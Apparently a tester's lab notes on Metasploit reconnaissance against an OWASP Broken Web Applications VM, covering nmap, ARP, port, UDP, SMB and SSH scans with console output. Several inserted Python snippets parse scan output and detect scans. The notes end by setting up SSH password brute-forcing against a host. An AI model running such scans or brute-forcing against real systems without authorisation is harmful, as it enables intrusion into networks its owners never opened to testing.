Starting the procedure proper: I. Information gathering
- Besides domain-name collection and social-engineering collection, for network-discovery-style information gathering I personally follow the OSI seven-layer model and collect from layer 2 up to layer 7, bottom to top.
- Use the auxiliary modules to do service discovery. auxiliary/scanner contains port scanners for many kinds of service software.
- Principle: send some packets to the port and identify the version and so on from the characteristics of the replies; no payload is sent to the target for execution, so nothing irreversible happens.
- nmap scan
msf5 > db_nmap -A 192.168.1.126
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-11 14:31 CST
[*] Nmap: Nmap scan report for 192.168.1.126
[*] Nmap: Host is up (0.000096s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 1024 ea:83:1e:45:5a:a6:8c:43:1c:3c:e3:18:dd:fc:88:a5 (DSA)
[*] Nmap: |_ 2048 3a:94:d8:3f:e0:a2:7a:b8:c3:94:d7:5e:00:55:0c:a7 (RSA)
[*] Nmap: 80/tcp open http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
[*] Nmap: |_http-title: owaspbwa OWASP Broken Web Applications
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 143/tcp open imap Courier Imapd (released 2008)
[*] Nmap: |_imap-capabilities: SORT completed CAPABILITY OK THREAD=ORDEREDSUBJECT ACL2=UNIONA0001 IMAP4rev1 THREAD=REFERENCES UIDPLUS CHILDREN IDLE NAMESPACE ACL QUOTA
[*] Nmap: 443/tcp open ssl/http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
[*] Nmap: |_http-title: owaspbwa OWASP Broken Web Applications
[*] Nmap: | ssl-cert: Subject: commonName=owaspbwa
[*] Nmap: | Not valid before: 2013-01-02T21:12:38
[*] Nmap: |_Not valid after: 2022-12-31T21:12:38
[*] Nmap: |_ssl-date: 2020-02-11T06:32:06+00:00; 0s from scanner time.
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 3306/tcp open mysql MySQL 5.1.41-3ubuntu12.6-log
[*] Nmap: |_mysql-info: ERROR: Script execution failed (use -d to debug)
[*] Nmap: 5001/tcp open java-rmi Java RMI
[*] Nmap: 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-server-header: Apache-Coyote/1.1
[*] Nmap: |_http-title: Site doesn't have a title.
[*] Nmap: 8081/tcp open http Jetty 6.1.25
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Jetty(6.1.25)
[*] Nmap: |_http-title: Choose Your Path
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port5001-TCP:V=7.60%I=7%D=2/11%Time=5E424A60%P=x86_64-pc-linux-gnu%r(NU
[*] Nmap: SF:LL,4,"\xac\xed\0\x05");
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: | smb-security-mode:
[*] Nmap: | account_used: guest
[*] Nmap: | authentication_level: user
[*] Nmap: | challenge_response: supported
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
[*] Nmap: |_smb2-time: Protocol negotiation failed (SMB2)
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 32.20 seconds
msf5 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.126 Linux server
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.126 22 tcp ssh open OpenSSH 5.3p1 Debian 3ubuntu4 Ubuntu Linux; protocol 2.0
192.168.1.126 80 tcp http open Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
192.168.1.126 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.126 143 tcp imap open Courier Imapd released 2008
192.168.1.126 443 tcp ssl/http open Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
192.168.1.126 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.126 3306 tcp mysql open MySQL 5.1.41-3ubuntu12.6-log
192.168.1.126 5001 tcp java-rmi open Java RMI
192.168.1.126 8080 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.1.126 8081 tcp http open Jetty 6.1.25
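As an added example (not part of the original notes), a small parser that turns the db_nmap lines above into a service list and pulls out the two findings a defender would act on from this scan: the TRACE method and the disabled SMB signing that nmap already flagged. The sample is a constructed subset of the output above; the rules, messages and the set of "admin" services are this example's own choices.

```python
import re

# Constructed sample: a subset of the db_nmap output shown above, with the
# "[*] Nmap: " prefix that msfconsole adds to every line.
SAMPLE = """\
[*] Nmap: 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 80/tcp open http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 ...)
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: 443/tcp open ssl/http Apache httpd 2.2.14 ((Ubuntu) mod_ssl/2.2.14 OpenSSL...)
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 3306/tcp open mysql MySQL 5.1.41-3ubuntu12.6-log
[*] Nmap: 5001/tcp open java-rmi Java RMI
[*] Nmap: Host script results:
[*] Nmap: | smb-security-mode:
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Findings worth a ticket. Rules and wording are this example's own choices.
TRACE_MSG = "HTTP TRACE enabled: disable it in the web server configuration"
SIGNING_MSG = "SMB signing disabled: require signing on the file server"
RULES = [("Potentially risky methods: TRACE", TRACE_MSG),
         ("message_signing: disabled", SIGNING_MSG)]
# Services that should not be reachable from untrusted networks (assumption).
ADMIN_SERVICES = {"ssh", "netbios-ssn", "mysql", "java-rmi"}

def parse_scan(text):
    """Return (services, findings). services: one dict per port line.
    findings: (port, message), with port None for host-level script results."""
    services, findings, port = [], [], None
    for raw in text.splitlines():
        line = raw.replace("[*] Nmap: ", "", 1).strip()
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            services.append({"port": port, "proto": m.group(2), "state": m.group(3),
                             "name": m.group(4), "version": m.group(5)})
            continue
        if line.startswith("Host script results"):
            port = None          # what follows is host-level, not per port
        for needle, msg in RULES:
            if needle in line:
                findings.append((port, msg))
    return services, findings

def exposed_admin_ports(services):
    """Open ports running a service from ADMIN_SERVICES, sorted."""
    return sorted(s["port"] for s in services
                  if s["state"] == "open" and s["name"] in ADMIN_SERVICES)
```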
- Auxiliary scanning:
- RHOSTS:
- 192.168.1.1-192.168.1.224 or 192.168.1.0/24: an explicit host IP range or a CIDR block can be given
- file:/root/host.txt: a host list in a file is also supported
- Network-layer scanning: ARP sits at "layer 2.5", working between the network layer and the data-link layer; for this workflow I am putting it under the network layer for now. search arp (ARP sends its packets to the local segment as broadcasts)
- auxiliary/scanner/discovery/arp_sweep: enumerates live hosts on the local network using ARP requests
- Enumerate alive Hosts in local network using ARP requests.
- RHOSTS and the other module options:
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 5 yes The number of seconds to wait for new data
# Required parameter: RHOSTS, the target hosts. Optional: SHOST (source IP) and SMAC (source MAC). Don't ask me why there is no port setting; if you have that question you don't need to read any further.
# THREADS is the thread count, TIMEOUT the timeout. I'm running in a VM with bridged networking, so I need to specify the interface name.
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set INTERFACE vbr0
INTERFACE => vbr0
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.1.2 appears to be up (Realtek (UpTech? also reported)).
[+] 192.168.1.126 appears to be up (Realtek (UpTech? also reported)).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/discovery/arp_sweep) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.2 52:54:00:9c:b6:8b
192.168.1.126 52:54:00:05:63:1f
# Result of the information gathering: two live host IPs on the network, and their MAC addresses have been obtained.
- auxiliary/scanner/discovery/ipv6_neighbor: enumerates local hosts that use IPv6
- Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address. Note, that like ARP scanning, this usually cannot be performed beyond the local broadcast network.
- Network-layer scanning, IP ID idle scan: relies on the rule that the IP ID sequence number, once initialized, increases by 1 with each reply.
- Find an ipidseq host: auxiliary/scanner/ip/ipidseq
- nmap -PN -sI <zombie host> <target host>
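An added example, not from the original notes: a classifier for the IP ID sequence that probes get back from a candidate zombie host, which is what auxiliary/scanner/ip/ipidseq reports before an idle scan can use the host. The labels and thresholds are this example's simplification of what the module and nmap do, and the sample sequences in the comments are constructed.

```python
# Classify the IP ID sequence observed from a candidate "zombie" host, the way
# auxiliary/scanner/ip/ipidseq (and nmap's ipidseq test) decide whether a host
# is usable for an idle scan. Labels and thresholds below are this example's
# own simplification, not the module's exact code.
MOD = 1 << 16   # IP ID is a 16-bit field, so deltas wrap around

def ipid_deltas(ids):
    """Differences between consecutive IP IDs, modulo 2^16."""
    return [(b - a) % MOD for a, b in zip(ids, ids[1:])]

def classify(ids):
    """Label a sequence of IP IDs taken from consecutive replies."""
    if len(ids) < 2:
        return "Unknown"
    if all(i == 0 for i in ids):
        return "All zeros"
    d = ipid_deltas(ids)
    if all(x == 0 for x in d):
        return "Constant"
    if all(1 <= x <= 5 for x in d):          # small gaps: zombie may talk to others
        return "Incremental"
    if all(x % 256 == 0 and 1 <= x // 256 <= 5 for x in d):
        return "Broken little-endian incremental"   # counter sent byte-swapped
    if max(d) > 20000:
        return "Randomized"
    return "Random positive increments"

def usable_zombie(ids):
    """True when a third party could use this host to count traffic it did
    not send; the fix is a randomized or per-destination IP ID, which modern
    kernels use by default."""
    return classify(ids) in ("Incremental", "Broken little-endian incremental")

def byte_swapped(ids):
    """Undo the byte order of a 'broken little-endian' host so its counter
    reads as a plain increment."""
    return [((x & 0xff) << 8) | (x >> 8) for x in ids]
```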
- Transport-layer TCP port scanning: search portscan; auxiliary/scanner/portscan/tcp is the one I recommend
- auxiliary/scanner/portscan/ack: sends TCP packets with the ACK flag set to the configured port range on the target IP to see whether the target host's ports are open.
Module options (auxiliary/scanner/portscan/ack):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.1.126 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
msf5 auxiliary(scanner/portscan/ack) > set INTERFACE vbr
INTERFACE => vbr
msf5 auxiliary(scanner/portscan/ack) > set SNAPLEN 4000
SNAPLEN => 4000
msf5 auxiliary(scanner/portscan/ack) > set THREADS 200
THREADS => 200
msf5 auxiliary(scanner/portscan/ack) > run
- auxiliary/scanner/portscan/syn: sends the server a TCP packet with the SYN flag set and checks what comes back: an open port answers with SYN+ACK, a port that is not there does not.
msf5 auxiliary(scanner/portscan/syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE vbr no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.1.126 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
msf5 auxiliary(scanner/portscan/syn) > set THREADS 8
THREADS => 8
msf5 auxiliary(scanner/portscan/syn) > set TIMEOUT 100
TIMEOUT => 100
msf5 auxiliary(scanner/portscan/syn) > run
[+] TCP OPEN 192.168.1.126:22
[+] TCP OPEN 192.168.1.126:80
[+] TCP OPEN 192.168.1.126:139
[+] TCP OPEN 192.168.1.126:143
[+] TCP OPEN 192.168.1.126:443
[+] TCP OPEN 192.168.1.126:445
[+] TCP OPEN 192.168.1.126:3306
- auxiliary/scanner/portscan/tcp: used much the same way, but it is very fast; I recommend this one for port scanning, it is a lot quicker. I tested it myself; I'll capture packets later and see how it works.
- It also relies on the first step of the TCP three-way handshake: it sends SYN and the server replies SYN+ACK to confirm the port is open, and it is fast, far faster than the other methods. I set the same number of threads, yet this one is simply much quicker.
msf5 auxiliary(scanner/portscan/tcp) > set THREADS 128
THREADS => 128
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.1.126: - 192.168.1.126:22 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:80 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:139 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:143 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:445 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:443 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:3306 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:5001 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:8080 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:8081 - TCP OPEN
[*] 192.168.1.126: - Scanned 1 of 1 hosts (100% complete)
- auxiliary/scanner/portscan/xmas: this one sends probes with the FIN, PSH and URG flags set to identify ports.
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
Description:
Enumerate open|filtered TCP services using a raw "XMas" scan; this
sends probes containing the FIN, PSH and URG flags.
msf5 auxiliary(scanner/portscan/xmas) > set INTERFACE vbr
INTERFACE => vbr
msf5 auxiliary(scanner/portscan/xmas) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/portscan/xmas) > set THREADS 128
THREADS => 128
msf5 auxiliary(scanner/portscan/xmas) > run
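From the receiving side, the three scanners above leave distinct traces: many bare SYNs to different ports, a FIN+PSH+URG probe that no real handshake produces, and bare ACKs for flows that never opened. An added example (not from the original notes) that flags each of them over constructed tcpdump-style lines; the thresholds and the simplified line format are assumptions.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style lines (simplified "Flags [..]" syntax) covering the
# three scanners used above: bare SYN to many ports, an Xmas probe (FIN+PSH+URG)
# and bare ACKs to many ports. 192.168.1.2 is a normal client for contrast.
SAMPLE = (
    [f"14:31:02.{i:03d} IP 192.168.1.254.4{i:04d} > 192.168.1.126.{i}: Flags [S]"
     for i in range(1, 13)]
    + ["14:31:03.500 IP 192.168.1.2.51000 > 192.168.1.126.445: Flags [S]",
       "14:31:03.501 IP 192.168.1.126.445 > 192.168.1.2.51000: Flags [S.]",
       "14:31:03.502 IP 192.168.1.2.51000 > 192.168.1.126.445: Flags [.]",
       "14:32:10.000 IP 192.168.1.254.40100 > 192.168.1.126.80: Flags [FPU]"]
    + [f"14:33:00.{i:03d} IP 192.168.1.254.4{i:04d} > 192.168.1.126.{100 + i}: Flags [.]"
       for i in range(12)]
)

LINE_RE = re.compile(
    r"^(\d\d):(\d\d):(\d\d)\.(\d+) IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > "
    r"(\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]*)\]")
SWEEP_PORTS = 10   # distinct ports from one source ...
WINDOW = 5.0       # ... within this many seconds (thresholds are this example's choice)
XMAS = {"F", "P", "U"}

def parse(line):
    """Return a dict for one line, or None if it is not a TCP flags line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mi, s, frac = m.group(1, 2, 3, 4)
    return {"t": int(h) * 3600 + int(mi) * 60 + int(s) + float("0." + frac),
            "src": m.group(5), "dst": m.group(7),
            "dport": int(m.group(8)), "flags": set(m.group(9))}

def detect(lines):
    """Return alerts as (kind, src, dst); each sweep fires once per pair."""
    alerts, fired, seen_syn = [], set(), set()
    recent = defaultdict(list)      # (kind, src, dst) -> [(t, dport), ...]
    for line in lines:
        p = parse(line)
        if p is None:
            continue
        key = (p["src"], p["dst"], p["dport"])
        if p["flags"] == XMAS:      # FIN+PSH+URG never occurs in a real handshake
            alerts.append(("xmas-scan", p["src"], p["dst"]))
            continue
        if p["flags"] == {"S"}:
            seen_syn.add(key)
            kind = "syn-sweep"
        elif p["flags"] == {"."} and key not in seen_syn:
            kind = "ack-sweep"      # bare ACK for a flow we never saw open
        else:
            continue                # SYN-ACK, data, or ACK of a known flow
        k = (kind, p["src"], p["dst"])
        recent[k] = [(t, d) for t, d in recent[k] if t > p["t"] - WINDOW]
        recent[k].append((p["t"], p["dport"]))
        if k not in fired and len({d for _, d in recent[k]}) >= SWEEP_PORTS:
            fired.add(k)
            alerts.append(k)
    return alerts
```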
- Transport-layer UDP port scanning:
- auxiliary/scanner/discovery/udp_sweep:
Module options (auxiliary/scanner/discovery/udp_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 10 yes The number of concurrent threads
msf5 auxiliary(scanner/discovery/udp_sweep) > set THREADS 128
THREADS => 128
msf5 auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 192.168.1.126->192.168.1.126 (1 hosts)
[*] Scanned 1 of 1 hosts (100% complete)
- auxiliary/scanner/discovery/udp_probe: the two are used much the same way; see the module options for the details.
Layer-5 information gathering:
- SMB scanning: auxiliary/scanner/smb/
- Version scan: auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.126, 192.168.1.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.126:445 - Host could not be identified: Unix (Samba 3.4.7)
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.1.2:445 - Host is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN-DR8RRLPJVVF) (workgroup:WORKGROUP ) (signatures:optional)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
- Scan named pipes to determine the SMB service type: auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.144
RHOSTS => 192.168.1.144
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[+] 192.168.1.144:139 - Pipes: \browser
[*] 192.168.1.144: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- Scan for DCERPC services reachable through SMB pipes: auxiliary/scanner/smb/pipe_dcerpc_auditor
Module options (auxiliary/scanner/smb/pipe_dcerpc_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPIPE BROWSER yes The pipe name to use (BROWSER)
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 192.168.1.144
RHOSTS => 192.168.1.144
msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 000001a0-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 06bba54a-be05-49f9-b0a0-30f790261023 1.0 OPEN VIA BROWSER
UUID 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 1.0 OPEN VIA BROWSER
UUID 0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 1.0 OPEN VIA BROWSER
UUID 12b81e99-f207-4a4c-85d3-77b42f76fd14 1.0 OPEN VIA BROWSER
UUID 18f70770-8e64-11cf-9af1-0020af6e72f4 0.0 OPEN VIA BROWSER
UUID 1ff70682-0a51-30e8-076d-740be8cee98b 1.0 OPEN VIA BROWSER
UUID 300f3532-38cc-11d0-a3f0-0020af6b0add 1.2 OPEN VIA BROWSER
UUID 378e52b0-c0a9-11cf-822d-00aa0051e40f 1.0 OPEN VIA BROWSER
UUID 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 1.0 OPEN VIA BROWSER
UUID 3f77b086-3a17-11d3-9166-00c04f688e28 1.0 OPEN VIA BROWSER
UUID 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 1.0 OPEN VIA BROWSER
UUID 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 1.1 OPEN VIA BROWSER
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 3.0 OPEN VIA BROWSER
UUID 621dff68-3c39-4c6c-aae3-e68e2c6503ad 1.0 OPEN VIA BROWSER
UUID 629b9f66-556c-11d1-8dd2-00aa004abd5e 3.0 OPEN VIA BROWSER
UUID 63fbe424-2029-11d1-8db8-00aa004abd5e 1.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-012892020162 0.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-46c3f87e345a 1.0 OPEN VIA BROWSER
UUID 8d0ffe72-d252-11d0-bf8f-00c04fd9126b 1.0 OPEN VIA BROWSER
UUID 8fb6d884-2388-11d0-8c35-00c04fda2795 4.1 OPEN VIA BROWSER
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID f50aac00-c7f3-428e-a022-a6b71bfb9d43 1.0 OPEN VIA BROWSER
[*] 192.168.1.144: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- SMB share enumeration: auxiliary/scanner/smb/smb_enumshares
- SMB user enumeration: auxiliary/scanner/smb/smb_enumusers
- SMB domain user enumeration: auxiliary/scanner/smb/smb_enumusers_domain
- SSH version scan: auxiliary/scanner/ssh/ssh_version (SSH protocol versions 1 and 1.9 have vulnerabilities)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 30 yes Timeout for the SSH probe
Description:
Detect SSH Version.
References:
http://en.wikipedia.org/wiki/SecureShell
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 16
THREADS => 16
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.1.126:22 - SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4 ( service.version=5.3p1 openssh.comment=Debian-3ubuntu4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=10.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:10.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.126:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.251
RHOSTS => 192.168.1.251
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.1.251:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.251:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_version) >
- SSH password brute-forcing: auxiliary/scanner/ssh/ssh_login, dictionary-based; auxiliary/scanner/ssh/ssh_login_pubkey, based on a key store. Medusa and Hydra are also decent SSH password brute-forcers; whether it succeeds mostly comes down to the size of the password file.
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.251
RHOSTS => 192.168.1.251
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE '/opt/metasploit-framework/embedded/framework/data/wordlists/root_userpass.txt'
USERPASS_FILE => /opt/metasploit-framework/embedded/framework/data/wordlists/root_userpass.txt
